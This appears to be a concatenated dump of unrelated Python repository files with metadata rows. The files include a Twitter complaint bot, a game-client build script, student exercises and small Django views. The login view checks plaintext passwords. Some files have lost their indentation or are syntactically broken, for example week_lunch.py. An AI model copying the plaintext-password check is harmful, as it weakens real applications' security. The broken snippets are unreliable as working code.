            self.set_inactive_user_if_exists(username)
            raise ValidationError(e.readable_error)
        except AuthException:
            return None
        except Exception:
            logger.exception('Ошибка получения пользователя')
            return None
        return self.get_and_update_user(username, password, user_dto)
| [
"artur1998g@gmail.com"
] | artur1998g@gmail.com |
5c14efc0e0b3c9c4b1040c89d95fd5e415c20404 | 872d8a57f0766dc34b23e1424cd7e6f7510c86e6 | /hack_api/views.py | 84242a04540aba76e7976f61e3a150af4182c6d1 | [] | no_license | ImAmanTanwar/egv-hackathon-project | 03e26b24ab1d1809bddcd47ad4f60a7410809ef2 | c115149ceee207230f103ecf8762c8b90e92268b | refs/heads/master | 2021-08-31T01:56:50.124360 | 2017-12-16T15:36:55 | 2017-12-16T15:36:55 | 114,392,102 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,963 | py | from django.shortcuts import render
from rest_framework import status
from rest_framework.decorators import api_view
from django.views.decorators.csrf import csrf_exempt
from rest_framework.response import Response
import datetime,traceback
from hackproject.models import Categories,SubCategories,Complains
import json,requests
import oauth2
import os
# Create your views here.
@api_view(['POST'])
def send(request):
    # Intake endpoint for a tweeted complaint: stores it, DMs the user a menu
    # of service codes for the detected category, and follows them back so
    # they can reply by DM. (Python 2 source: uses print statements.)
    twitter_auth_token_key = os.environ['CLIENT_TWITTER_TOKEN_KEY']
    twitter_auth_token_secret = os.environ['CLIENT_TWITTER_TOKEN_SECRET']
    tweet = request.data['tweet_text']
    user_id = request.data['user_id']
    hashtags = request.data['hashtags']
    user_name = request.data['user_name']
    handle = request.data['handle']
    # Map the hashtag to a category id (1..8).
    # NOTE(review): check() returns None for an unrecognized hashtag, which
    # would make the Categories.objects.get(c_id='None') lookup fail.
    cat=check(hashtags)
    print cat
    category = Categories.objects.get(c_id=str(cat))
    categories = SubCategories.objects.filter(group_id=category)
    # Build the DM body listing "<service name> - <service code>" options.
    post_body="text=Select from below codes"+"\n"
    for c in categories:
        print c.service_name
        post_body+=c.service_name+" - "+c.service_code+"\n"
    post_body+="Please reply as <Phone Number>:<Status Code>:<Address>;screen_name="+handle
    # Coordinates are optional on the incoming payload.
    try:
        lat=str(request.data['user_lat'])
    except:
        lat=""
    try:
        lon = str(request.data['user_lon'])
    except:
        lon=""
    # Persist the raw complaint; phone/service code get filled in later by view().
    obj = Complains(tweet=tweet,user_id=user_id,user_name=user_name,lat=lat,lon=lon)
    obj.save()
    #post_body = "status=@"+data["handle"]+" Please reply with your phone and email in Direct Message;in_reply_to_status_id="+data["tweet_id"]
    home_timeline = oauth_req( 'https://api.twitter.com/1.1/direct_messages/new.json', twitter_auth_token_key, twitter_auth_token_secret,post_body)
    # Follow the user so they are able to DM us back.
    post_body="user_id="+user_id+";follow=true"
    home_timeline = oauth_req( 'https://api.twitter.com/1.1/friendships/create.json', twitter_auth_token_key, twitter_auth_token_secret,post_body )
    print post_body
    return Response('{"status":"ok"}',status=status.HTTP_201_CREATED)
@api_view(['POST'])
def view(request):
user_id = request.data["user_id"]
message = request.data["message"]
if "status" in message:
code,srn_status=message.split()
stat = get_srn_status(srn_status)
post_body="user_id="+user_id+";text=Your Status is REGISTERED"
home_timeline = oauth_req( 'https://api.twitter.com/1.1/direct_messages/new.json', twitter_auth_token_key, twitter_auth_token_secret,post_body)
else:
if ":" in message:
phone, service_code,address = message.split(":")
else:
phone="0000000000"
service_code="DEFAULT"
address="Bangalore"
print phone,service_code
user = Complains.objects.filter(user_id=user_id,mobile_no="",service_code="")
service_name=SubCategories.objects.get(service_code=service_code).service_name
srn_num=""
for u in user:
u.mobile_no = phone
u.service_code = service_code
u.save()
srn_num = getsrn(service_code,service_name,u.lat,u.lon,address,u.user_name,phone,u.tweet)
print srn_num
post_body="text=Complaint Registered successfully. SRN Number: "+srn_num+";user_id="+user_id
home_timeline = oauth_req( 'https://api.twitter.com/1.1/direct_messages/new.json', twitter_auth_token_key, twitter_auth_token_secret,post_body)
with open("srn.txt", "a") as myfile:
myfile.write(srn_num+"\n")
return Response('{"status":"ok"}',status=status.HTTP_201_CREATED)
def oauth_req(url, key, secret, post_body, http_method="POST", http_headers=None):
    """Issue an OAuth1-signed HTTP request to the Twitter API.

    `key`/`secret` are the user's access token pair; the app consumer
    credentials come from the TWITTER_KEY / TWITTER_SECRET environment
    variables. Returns the raw response body.
    """
    app_consumer = oauth2.Consumer(key=os.environ['TWITTER_KEY'],
                                   secret=os.environ['TWITTER_SECRET'])
    user_token = oauth2.Token(key=key, secret=secret)
    http_client = oauth2.Client(app_consumer, user_token)
    _response, body = http_client.request(url, method=http_method,
                                          body=post_body, headers=http_headers)
    return body
def check(st):
    """Map a category hashtag (case-insensitive) to its 1-based category id.

    Returns None when the hashtag is not a known category.
    """
    categories = ('default', 'streetlight', 'engineering', 'health',
                  'administration', 'townplanning', 'revenue', 'watersupply')
    wanted = st.lower()
    for position, category in enumerate(categories, start=1):
        if category == wanted:
            return position
    return None
def getsrn(service_code,service_name,lat,lon,address,name,phone,tweet):
    # Submit a new PGR (public grievance) service request to the eGov API and
    # return the generated SRN. (Python 2 source: uses print statements.)
    # NOTE(review): the `address` parameter is not used in the payload — the
    # address fields below are hardcoded literals.
    print service_code+" "+service_name+" "+lat+" "+lon+" "+address+" "+name+" "+phone
    url=os.environ["EG_API_URL"]+"?jurisdiction_id=default"
    headers={"Content-Type":"application/json"}
    # Request envelope expected by the eGov PGR service; most RequestInfo
    # fields are fixed placeholder values.
    data={
        "RequestInfo":{
            "api_id":"org.egov.pgr",
            "ver":"1.0",
            "ts":"21-04-2017 15:55:37",
            "action":"POST",
            "did":"4354648646",
            "key":"xyz",
            "msg_id":"654654",
            "requester_id":"61",
            "auth_token":None
        },
        "ServiceRequest":{
            "service_code":service_code,
            "description":tweet,
            "address_id":"258",
            "lat":lat,
            "lng":lon,
            "address":"Near Central area",
            "service_request_id":"",
            "first_name":name,
            "phone":phone,
            "email":"kumar@ccc.com",
            "status":True,
            "service_name":service_name,
            "requested_datetime":"",
            "media_url":"",
            "tenantId":"default",
            "values":{
                "receivingMode":"Website",
                "receivingCenter":"",
                "status":"REGISTERED",
                "complainantAddress":"Near central bus stop"
            }
        }
    }
    r = requests.post(url,data=json.dumps(data),headers=headers)
    print r
    # The API returns the assigned service_request_id (the SRN).
    return r.json()["service_requests"][0]["service_request_id"]
def get_srn_status(srn_num):
url = os.environ["EG_API_URL"]
params={"jurisdiction_id":"2",
"service_request_id":srn_num
}
headers={
"api_id":"org.egov.pgr",
"ver":"1.0",
"ts":"28-03-2016 10:22:33",
"action":"GET",
"did":"4354648646",
"msg_id":"03447364-19c8-4ad0-a59d-ab2a385b19d5",
"requester_id":"61",
"auth_token":"null"
}
r=requests.get(url,headers=headers,params=params)
print r.json()
| [
"amantanwar1994@gmail.com"
] | amantanwar1994@gmail.com |
47466b53530a7e9c3f7c8c4065f831ce72d30c20 | 12abe02e205d3e8dabe78fb5a93ccca89e2c42c4 | /tools/prepare_client.py | 6e73dd03164c3faee99d8c53e13fe17142da37b8 | [] | no_license | nate97/toontown-src-py3.0 | 55092b2973b76e6b6d566887f44c52822684394c | f76c515801ae08c40b264b48365211fd44b137eb | refs/heads/master | 2022-07-07T05:23:22.071185 | 2022-06-22T16:36:10 | 2022-06-22T16:36:10 | 187,682,471 | 15 | 8 | null | null | null | null | UTF-8 | Python | false | false | 6,291 | py | #!/usr/bin/env python2
import argparse
import hashlib
import os
from panda3d.core import *
import shutil
# Command-line interface for the client build.
# FIX: --include/--exclude/--vfs use action='append', whose implicit default
# is None; later code does `filename not in args.include` and iterates
# args.vfs, which raised TypeError whenever those flags were omitted.
# An explicit empty-list default makes the flags truly optional.
parser = argparse.ArgumentParser()
parser.add_argument('--distribution', default='en',
                    help='The distribution string.')
parser.add_argument('--build-dir', default='build',
                    help='The directory in which to store the build files.')
parser.add_argument('--src-dir', default='..',
                    help='The directory of the Toontown Infinite source code.')
parser.add_argument('--server-ver', default='toontown-dev',
                    help='The server version of this build.')
parser.add_argument('--build-mfs', action='store_true',
                    help='When present, the resource multifiles will be built.')
parser.add_argument('--resources-dir', default='../resources',
                    help='The directory of the Toontown Infinite resources.')
parser.add_argument('--config-dir', default='../config/release',
                    help='The directory of the Toontown Infinite configuration files.')
parser.add_argument('--include', '-i', action='append', default=[],
                    help='Explicitly include this file in the build.')
parser.add_argument('--exclude', '-x', action='append', default=[],
                    help='Explicitly exclude this file from the build.')
parser.add_argument('--vfs', action='append', default=[],
                    help='Add this file to the virtual file system at runtime.')
parser.add_argument('modules', nargs='*', default=['otp', 'toontown'],
                    help='The Toontown Infinite modules to be included in the build.')
args = parser.parse_args()
print('Preparing the client...')
# Create a clean directory to store the build files in:
# (an existing build dir is wiped entirely so stale files can't leak in)
if os.path.exists(args.build_dir):
    shutil.rmtree(args.build_dir)
os.mkdir(args.build_dir)
print('Build directory = ' + args.build_dir)
# Copy the provided Toontown Infinite modules:
def minify(f):
"""
Returns the "minified" file data with removed __debug__ code blocks.
"""
data = ''
debugBlock = False # Marks when we're in a __debug__ code block.
elseBlock = False # Marks when we're in an else code block.
# The number of spaces in which the __debug__ condition is indented:
indentLevel = 0
for line in f:
thisIndentLevel = len(line) - len(line.lstrip())
if ('if __debug__:' not in line) and (not debugBlock):
data += line
continue
elif 'if __debug__:' in line:
debugBlock = True
indentLevel = thisIndentLevel
continue
if thisIndentLevel <= indentLevel:
if 'else' in line:
elseBlock = True
continue
if 'elif' in line:
line = line[:thisIndentLevel] + line[thisIndentLevel+2:]
data += line
debugBlock = False
elseBlock = False
indentLevel = 0
continue
if elseBlock:
data += line[4:]
return data
# Copy each requested module tree into the build dir, minifying every .py file
# and skipping server-side code. Files listed via -i bypass the filters; files
# listed via -x are dropped.
# NOTE(review): if -i / -x / --vfs were never passed, argparse's append action
# leaves those attributes as None, and the membership tests below raise
# TypeError — the flags are effectively mandatory as written.
for module in args.modules:
    print('Writing module...', module)
    for root, folders, files in os.walk(os.path.join(args.src_dir, module)):
        outputDir = root.replace(args.src_dir, args.build_dir)
        if not os.path.exists(outputDir):
            os.mkdir(outputDir)
        for filename in files:
            if filename not in args.include:
                # Default filters: Python sources only, excluding the
                # AI/UD (server-side) variants.
                if not filename.endswith('.py'):
                    continue
                if filename.endswith('UD.py'):
                    continue
                if filename.endswith('AI.py'):
                    continue
                if filename in args.exclude:
                    continue
            with open(os.path.join(root, filename), 'r') as f:
                data = minify(f)
            with open(os.path.join(outputDir, filename), 'w') as f:
                f.write(data)
# Let's write game_data.py now. game_data.py is a compile-time generated
# collection of data that will be used by the game at runtime. It contains the
# PRC file data, and (stripped) DC file:
# First, we need to add the configuration pages:
configData = []
with open('../config/general.prc') as f:
    configData.append(f.read())
configFileName = args.distribution + '.prc'
configFilePath = os.path.join(args.config_dir, configFileName)
print('Using configuration file: ' + configFilePath)
with open(configFilePath) as f:
    data = f.readlines()
# Replace server-version definitions with the desired server version:
for i, line in enumerate(data):
    if 'server-version' in line:
        data[i] = 'server-version ' + args.server_ver
# Add our virtual file system data:
data.append('\n# Virtual file system...\nmodel-path /\n')
for filepath in args.vfs:
    data.append('vfs-mount %s /\n' % filepath)
# NOTE(review): readlines() keeps each line's '\n', so joining with '\n'
# double-spaces the untouched lines — confirm this is intentional.
configData.append('\n'.join(data))
# Next, we need the DC file:
dcData = ''
filepath = os.path.join(args.src_dir, 'astron/dclass')
for filename in os.listdir(filepath):
    if filename.endswith('.dc'):
        fullpath = str(Filename.fromOsSpecific(os.path.join(filepath, filename)))
        print('Reading %s...' % fullpath)
        with open(fullpath, 'r') as f:
            data = f.read()
        # Strip import lines: the client resolves those at runtime instead.
        for line in data.split('\n'):
            if 'import' in line:
                data = data.replace(line + '\n', '')
        dcData += data
# Finally, write our data to game_data.py:
print('Writing game_data.py...')
gameData = 'CONFIG = %r\nDC = %r\n'
# NOTE(review): writing a str to a 'wb' handle only works on Python 2 —
# this script targets python2 per its shebang.
with open(os.path.join(args.build_dir, 'game_data.py'), 'wb') as f:
    f.write(gameData % (configData, dcData.strip()))
# We have all of the code gathered together. Let's create the multifiles now:
# Each phase_* directory in the resources tree is packed into a Panda3D
# multifile via the external `multify` tool.
if args.build_mfs:
    print('Building multifiles...')
    dest = os.path.join(args.build_dir, 'resources')
    if not os.path.exists(dest):
        os.mkdir(dest)
    dest = os.path.realpath(dest)
    # multify is invoked with relative paths, so work from the resources dir.
    os.chdir(args.resources_dir)
    for phase in os.listdir('.'):
        if not phase.startswith('phase_'):
            continue
        if not os.path.isdir(phase):
            continue
        filename = phase + '.mf'
        print('Writing...', filename)
        filepath = os.path.join(dest, filename)
        os.system('multify -c -f "%s" "%s"' % (filepath, phase))
print('Done preparing the client.')
| [
"nathanielfuhr@gmail.com"
] | nathanielfuhr@gmail.com |
77c2182969c900ebd6dd341a5877ea6b0d7bda9c | f2f67ddfca321dd9eb6480cfe4765d3a7d241371 | /tarea7Completa.py | a51e5db9f67df0aac54ae11558ad0ab209884f90 | [] | no_license | DianaAguilarMtz/Tarea_07 | 1e1c08b42e8a25a136977b6f0583646f39c24457 | f6f74e883f268aad44844230b647b92bb4706a19 | refs/heads/master | 2021-04-06T01:54:49.987647 | 2018-03-14T22:54:24 | 2018-03-14T22:54:24 | 125,282,612 | 0 | 0 | null | 2018-03-14T22:38:52 | 2018-03-14T22:38:52 | null | UTF-8 | Python | false | false | 2,128 | py | # Autor: Diana Aguilar Mtz
# Descripcion:
#funcion 1: hace divisiones y te muestra el residuo.
def probarDivisores():
    """Prompt for a divisor and a dividend, then print quotient and remainder."""
    print(" ")
    print("Bienvenido al programa de divisores")
    divisor = int(input("Divisor: "))
    dividendo = int(input("Dividendo: "))
    # divmod gives floor quotient and remainder in one step.
    cociente, residuo = divmod(dividendo, divisor)
    print(dividendo, "/", divisor, "=", cociente, ", sobra: ", residuo)
# funcion 2: te muestra el numero mayor que hayas ingresado, sin saber cuando vas a parar.
def determinarMayor():
    """Read integers until -1 is entered and report the largest one seen.

    FIX: the original read a number, then immediately read *another* inside
    the loop before comparing, so the first entry was never considered
    (e.g. inputs 9, 3, -1 reported 3). Each number is now compared before
    the next one is read.
    """
    print(" ")
    print("Bienvenido al programa que encuentra el mayor")
    numeroMayor = 0  # running maximum (0 when nothing positive was entered)
    n = int(input("Teclee un número [-1 para salir]: "))
    if n == -1:  # user quit before entering any number
        print("No hay numero mayor")
        return
    while n != -1:
        if n > numeroMayor:
            numeroMayor = n
        n = int(input("Teclee un número [-1 para salir]: "))
    print("el numero mayor es: ", numeroMayor)
def main():
    # Menu loop: shows the options, dispatches to the two exercises, and
    # keeps re-prompting until the user picks 3 (exit) or enters a value <= 0.
    print("""Tarea 7: Ciclos While
    Autor: Diana Aguilar Mtz.
        1: Imprimir divisores
        2: Encontrar el mayor
        3: Salir """)
    opcion = int(input("Teclea tu opción: "))  # the user picks an action
    while opcion >0:  # main loop: keep showing the menu
        if opcion == 1:
            probarDivisores()  # option 1
        elif opcion == 2:
            determinarMayor()  # option 2
        elif opcion == 3:  # exit the program
            break
        else:
            print("ERROR, teclea 1, 2 o 3")  # shown for any option above 3
        print("""
    Tarea 7: Ciclos While
    Autor: Diana Aguilar Mtz.
        1: Imprimir divisores
        2: Encontrar el mayor
        3: Salir """)
        opcion = int(input("Teclea tu opción: "))
    print(" ")
    print("Gracias por usar este programa, vuelve pronto")  # farewell message
main()
| [
"noreply@github.com"
] | DianaAguilarMtz.noreply@github.com |
d1433640b2aaccd380003e310321de06c7b8b95c | cec7e0f0f7ada1e662d8bc7221e951f5215d34f8 | /django_auth/views.py | 30ba2449edb5f1086ced65e36fb5e3d735615f73 | [] | no_license | Wanke15/django_auth | d92a2f63da64a3c053780e6efe0e005964d58e0d | 5941f5fd3e8f4b6e2b763e1281db814d721c6dc9 | refs/heads/main | 2023-02-19T00:34:51.199410 | 2021-01-12T15:39:10 | 2021-01-12T15:39:10 | 329,030,416 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 474 | py | from django.shortcuts import render, redirect
from search.models import User
def login(request):
    """Render the login page on GET; authenticate on POST.

    On a successful POST the username is stored in the session and the user
    is redirected to /index/. FIX: on failed credentials (and on any other
    method) the original fell off the end and returned None, which makes
    Django raise "view didn't return an HttpResponse" — the form is now
    re-rendered instead.
    """
    if request.method == "GET":
        return render(request, 'login.html')
    if request.method == "POST":
        username = request.POST.get('username', "")
        password = request.POST.get('password', "")
        # SECURITY NOTE(review): this matches a plaintext password column;
        # Django's auth framework (check_password/authenticate) should be
        # used instead of storing and comparing raw passwords.
        if User.objects.filter(username=username, password=password):
            request.session["username"] = username
            return redirect("/index/")
        # Invalid credentials: show the form again instead of returning None.
        return render(request, 'login.html')
    # Any other HTTP method also gets the form.
    return render(request, 'login.html')
| [
"1015005300@qq.com"
] | 1015005300@qq.com |
a5a0f83dda23889e95f693472e9a4e3bb2c874a0 | 79542b110ca0443f6a180f6f906a15f049485962 | /django-leaning/ch07/mysite/polls/views.py | f02e8ddc2bfd8445c45a16f104264e517a799592 | [] | no_license | devuser/spark-notes | 9e1c207f052eed43fae2a436f63a6ac0bad0d83b | 4429e08f66fc4dcf7502314995559c1de0d07ec6 | refs/heads/master | 2021-05-16T03:03:59.665992 | 2017-09-29T05:31:13 | 2017-09-29T05:31:13 | 42,443,800 | 20 | 2 | null | null | null | null | UTF-8 | Python | false | false | 2,046 | py | from django.shortcuts import get_object_or_404, render
from .models import Question
from django.http import Http404
from django.http import HttpResponseRedirect, HttpResponse
from django.urls import reverse
from django.utils import timezone
from .models import Choice, Question
from django.shortcuts import get_object_or_404, render
from django.http import HttpResponseRedirect
from django.urls import reverse
from django.views import generic
from .models import Choice, Question
class IndexView(generic.ListView):
    """Front page: lists the five most recently published questions."""

    template_name = 'polls/index.html'
    context_object_name = 'latest_question_list'

    def get_queryset(self):
        """Return the last five published questions, excluding any whose
        pub_date lies in the future."""
        published = Question.objects.filter(pub_date__lte=timezone.now())
        return published.order_by('-pub_date')[:5]
class DetailView(generic.DetailView):
    """Voting-form page for a single question."""

    model = Question
    template_name = 'polls/detail.html'

    def get_queryset(self):
        """Hide questions that are not published yet."""
        now = timezone.now()
        return Question.objects.filter(pub_date__lte=now)
class ResultsView(generic.DetailView):
    # Results page for one question; the template reads the vote counts
    # straight off the related Choice objects.
    model = Question
    template_name = 'polls/results.html'
def vote(request, question_id):
    """Register a POSTed vote for one of *question_id*'s choices.

    Re-renders the detail page with an error message when no choice was
    submitted; on success redirects to the results page.
    """
    question = get_object_or_404(Question, pk=question_id)
    try:
        selected_choice = question.choice_set.get(pk=request.POST['choice'])
    except (KeyError, Choice.DoesNotExist):
        # Redisplay the question voting form.
        return render(request, 'polls/detail.html', {
            'question': question,
            'error_message': "You didn't select a choice.",
        })
    else:
        # F() performs the increment inside the database, avoiding the
        # read-modify-write race between concurrent voters.
        from django.db.models import F
        selected_choice.votes = F('votes') + 1
        selected_choice.save()
        # Always return an HttpResponseRedirect after successfully dealing
        # with POST data. This prevents data from being posted twice if a
        # user hits the Back button.
        return HttpResponseRedirect(reverse('polls:results', args=(question.id,)))
| [
"pythoner@icloud.com"
] | pythoner@icloud.com |
958cf3f290b54cc90305a031368d936cc73d933f | 146bca615b0061501ca7d4c021f592cea4820548 | /django/sample/polls/migrations/0002_auto_20170717_0920.py | 59ced813683c1b84b2ecc38eae050a94dfb5816c | [
"MIT"
] | permissive | jyodroid/python_training | abb9485bb185f9ddfd663440b94a96a0a57d470a | 7b17145faed6a005d44a08c2f72a60644705f1e1 | refs/heads/master | 2020-06-14T20:28:23.211739 | 2017-09-14T16:52:36 | 2017-09-14T16:52:36 | 75,350,329 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 430 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.3 on 2017-07-17 14:20
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
    # Auto-generated migration: renames Question.questio_text (typo in
    # 0001_initial) to question_text.

    dependencies = [
        ('polls', '0001_initial'),
    ]

    operations = [
        migrations.RenameField(
            model_name='question',
            old_name='questio_text',
            new_name='question_text',
        ),
    ]
| [
"jtangarife@isf.com.co"
] | jtangarife@isf.com.co |
97cd0d9b095f822538a9db1a5b6aaa38fceb77f8 | a81b4ff2029f9e1ae0a9ff864c78a57622a49779 | /allgraphs-russian.py | 2f4816e085b139c3f401179ef47156189d2ff060 | [] | no_license | EArwa/LVfeederDERsimulation | 7b33ecbe0a3ca1db53bde2669088d219d4170821 | c04bfbd44071279a4d4f106282a8cde0877faa6f | refs/heads/master | 2023-04-18T07:21:02.468933 | 2021-05-04T18:35:25 | 2021-05-04T18:35:25 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,101 | py | import os
import pandas as pd
import matplotlib.pyplot as plt

# Pre-computed feeder-simulation summaries, one CSV per DER scenario
# (PV+EV+battery, PV+battery, EV+battery).
pv_ev_bat_data = pd.read_csv("data/results/PV_EV_battery/04-graph-data/graph-data.csv",
                             sep=",", decimal=".")
pv_bat_data = pd.read_csv("data/results/PV_battery/04-graph-data/graph-data.csv",
                          sep=",", decimal=".")
ev_bat_data = pd.read_csv("data/results/EV_battery/04-graph-data/graph-data.csv",
                          sep=",", decimal=".")

# Normalise the index dtype to integers.
# NOTE(review): sort_index() is not in-place -- the sorted copies below
# are discarded; likely intended df = df.sort_index().
pv_ev_bat_data.index = pv_ev_bat_data.index.astype(int)
pv_ev_bat_data.sort_index()
pv_bat_data.index = pv_bat_data.index.astype(int)
pv_bat_data.sort_index()
ev_bat_data.index = ev_bat_data.index.astype(int)
ev_bat_data.sort_index()

# Series colour per collective-optimisation percentage.
colors = {
    0: 'red',
    25: 'blue',
    50: 'yellow',
    75: 'orange',
    100: 'green'
}
# Russian legend labels ("N% collective optimisation").
cooperation_labels = {
    0: '0% коллективной оптимизации',
    25: '25% коллективной оптимизации',
    50: '50% коллективной оптимизации',
    75: '75% коллективной оптимизации',
    100: '100% коллективной оптимизации'
}
def plot_results(data, ycolumn, xlabel, ylabel, title, filename):
    """Scatter-plot *ycolumn* against the DER installation share, one
    colour/series per cooperation level (0..100% in steps of 25), and
    save the figure as graphs/scatter-plots/ru/<filename>.

    *data* must provide 'cooperation_percent', 'installations_percent'
    and *ycolumn* columns.
    """
    fig, ax = plt.subplots()
    for cooperationPercent in range(0, 101, 25):
        singleDataFrame = data.loc[data['cooperation_percent']
                                   == cooperationPercent]
        ax.scatter('installations_percent', ycolumn, data=singleDataFrame,
                   color=colors[cooperationPercent], linewidth=2,
                   label=cooperation_labels[cooperationPercent])

    plt.grid()
    plt.legend(loc="upper left")
    plt.xlabel(xlabel)
    plt.ylabel(ylabel)
    plt.title(title)

    dir_path = "graphs/scatter-plots/ru"
    file_path = "{}/{}".format(dir_path, filename)
    os.makedirs(
        dir_path, exist_ok=True)
    plt.savefig(file_path)
    # Close the figure: main() calls this 12 times and open figures
    # would otherwise accumulate in memory (pyplot keeps them alive).
    plt.close(fig)
def main():
    """Render all 12 scatter plots: {Ku, Kp} x {consumer bus, LV
    transformer bus} for each of the three DER scenarios.

    NOTE(review): the titles mix 'на шине' and 'на шинах' for the same
    metric -- kept verbatim; confirm whether that is intentional.
    """
    # Ku (voltage factor) at the consumer bus
    plot_results(
        pv_ev_bat_data, 'voltage_factor', 'Уровень распределенных энергоресурсов [%]', 'Ku', 'Ku, на шине потребителя', 'PV_EV_battery Ku на шине потребителя.png')
    plot_results(pv_bat_data, 'voltage_factor', 'Уровень распределенных энергоресурсов [%]', 'Ku',
                 'Ku, на шинах потребителя', 'PV_battery Ku на шине потребителя.png')
    plot_results(ev_bat_data, 'voltage_factor', 'Уровень распределенных энергоресурсов [%]', 'Ku',
                 'Ku, на шинах потребителя', 'EV_battery Ku на шине потребителя.png')
    # Ku at the transformer low-voltage bus
    plot_results(
        pv_ev_bat_data, 'lv_voltage_factor', 'Уровень распределенных энергоресурсов [%]', 'Ku', 'Ku, на шине НН трансформатора', 'PV_EV_battery Ku на шине НН трансформатора.png')
    plot_results(pv_bat_data, 'lv_voltage_factor', 'Уровень распределенных энергоресурсов [%]', 'Ku',
                 'Ku, на шине НН трансформатора', 'PV_battery Ku на шине НН трансформатора.png')
    plot_results(ev_bat_data, 'lv_voltage_factor', 'Уровень распределенных энергоресурсов [%]', 'Ku',
                 'Ku, на шине НН трансформатора', 'EV_battery Ku на шине НН трансформатора.png')
    # Kp (load factor) at the consumer bus
    plot_results(
        pv_ev_bat_data, 'load_factor', 'Уровень распределенных энергоресурсов [%]', 'Kp', 'Kp, на шине потребителя', 'PV_EV_battery Kp на шине потребителя.png')
    plot_results(pv_bat_data, 'load_factor', 'Уровень распределенных энергоресурсов [%]', 'Kp',
                 'Kp, на шине потребителя', 'PV_battery Kp на шине потребителя.png')
    plot_results(ev_bat_data, 'load_factor', 'Уровень распределенных энергоресурсов [%]', 'Kp',
                 'Kp, на шине потребителя', 'EV_battery Kp на шине потребителя.png')
    # Kp at the transformer low-voltage bus
    plot_results(
        pv_ev_bat_data, 'lv_load_factor', 'Уровень распределенных энергоресурсов [%]', 'Kp', 'Kp, на шине НН трансформатора', 'PV_EV_battery Kp на шине НН трансформатора.png')
    plot_results(pv_bat_data, 'lv_load_factor', 'Уровень распределенных энергоресурсов [%]', 'Kp',
                 'Kp, на шине НН трансформатора', 'PV_battery Kp на шине НН трансформатора.png')
    plot_results(ev_bat_data, 'lv_load_factor', 'Уровень распределенных энергоресурсов [%]', 'Kp',
                 'Kp, на шине НН трансформатора', 'EV_battery Kp на шине НН трансформатора.png')
if __name__ == "__main__":
main()
| [
"ellina.shurovsk@gmail.com"
] | ellina.shurovsk@gmail.com |
961bd3a9c5a9c94b6844fd35f9644acc5f43a6f4 | 102b692e41a2fe9880244aa29f9369c08f3260ca | /week_lunch.py | db855f008fe8970764593e0a548848b5dc0eb9ef | [] | no_license | Mamata720/if-else | 25cf74b71057067df973023dba4f0d70c5b9a89f | 1a766a10e00f6303ff8dc7c48b5f386161bd7caa | refs/heads/main | 2023-06-19T02:21:57.159225 | 2021-07-19T18:12:04 | 2021-07-19T18:12:04 | 386,961,333 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 789 | py | day=input("enter the day")
if day=="sunday":
print("poha")
if day=="munday":
print("khichidi")
if day=="thusday":
print("dal chavl")
if day==wedenesday:
print("sabji roti")
if day=="thursday":
print("kheer")
if day=="friday":
print("poha")
if day==seterday:
print("edli")
else:
print("no")
else:
print("no")
else:
print("no")
else:
print("no")
else:
print("no")
else:
print("no")
else:
print("no") | [
"noreply@github.com"
] | Mamata720.noreply@github.com |
02b0333d499f2b4da71514ad0918390d9f4ad32c | fb35e41ab2cc3ea65f7cdf72a3ef8b0ed9f19071 | /shop/context_processors.py | e5763a344f748ea34e86057e08439fe2ffeb9e4d | [
"MIT"
] | permissive | euanrussano/tinyshop | 61cf45e722e369fe6c9579136515f00782791718 | 263280258e55351c833064889ee847ce137dd4d3 | refs/heads/master | 2023-05-31T08:20:56.006628 | 2021-06-12T01:11:44 | 2021-06-12T01:11:44 | 376,150,008 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 642 | py | from django.conf import settings # import the settings file
def website_info(request):
    # Template context processor: injects the site-wide branding and
    # contact settings below into every template context.  *request* is
    # required by the context-processor API but unused here; add more
    # key/value pairs to expose further settings.
    return {
        'WEBSITE_NAME': settings.WEBSITE_NAME,
        'PHONE_NUMBER': settings.PHONE_NUMBER,
        'EMAIL': settings.EMAIL,
        'ADDRESS': settings.ADDRESS,
        'FACEBOOK': settings.FACEBOOK,
        'LINKEDIN': settings.LINKEDIN,
        'TWITTER': settings.TWITTER,
        'RSS': settings.RSS,
        'PINTEREST': settings.PINTEREST,
        'WHATSAPP': settings.WHATSAPP,
} | [
"euanrussano@gmail.com"
] | euanrussano@gmail.com |
533e268693eea62c5bb3f69ab76a803526a65160 | ba5a6f1b6776c3503a4e6f486795ffd62a11810b | /Loja/estoque/serializers.py | 6776b5b59e391210ae635f5792ccc069004d7f4b | [] | no_license | AmaroCesa/intmed_test | 9e4e78a0dc7eb989b797ca9b5c56d94588d08193 | 1e59a365298ad33216aad5635b6df3fe98749c7c | refs/heads/master | 2021-06-13T06:44:29.943526 | 2019-05-27T02:08:47 | 2019-05-27T02:08:47 | 155,141,625 | 0 | 0 | null | 2021-06-10T20:56:24 | 2018-10-29T02:44:41 | JavaScript | UTF-8 | Python | false | false | 202 | py | from rest_framework import serializers
from .models import Estoque
class EstoqueSerializer(serializers.HyperlinkedModelSerializer):
    """REST serializer exposing every field of the Estoque model."""
    class Meta:
        model = Estoque
        # '__all__' serializes every model field (the parentheses here
        # are grouping, not a tuple).
        fields = ('__all__')
| [
"amaro.txt@gmail.com"
] | amaro.txt@gmail.com |
f5397c8cf5a875624c2bbafbf473044f93f85d2a | 2d0acf215e4863273075053712ff7df94775153a | /script/Main.py | 83dc303b008fba809742a9b21cefb599e2542080 | [
"MIT"
] | permissive | iOSToolsOS/json2model | 712cc187e4d057d7483088c16d0d32b930d322ef | 1b17d6b2850bf48ec93e040683ac04c36f2a7be0 | refs/heads/master | 2020-04-15T01:16:10.520583 | 2019-02-01T03:28:27 | 2019-02-01T03:28:27 | 164,269,199 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 222 | py | import JsonParser
import json

# Parse the sample JSON into Swift model source lines, echo them, then
# write them out as ResultModel.swift (one source line per list entry).
with open("jsons.txt", "r") as source:
    swift_lines = JsonParser.parse(source.read(), "Result")

print(swift_lines)

with open("ResultModel.swift", "w") as target:
    target.writelines(line + '\n' for line in swift_lines)
| [
"shmilyshijian@foxmail.com"
] | shmilyshijian@foxmail.com |
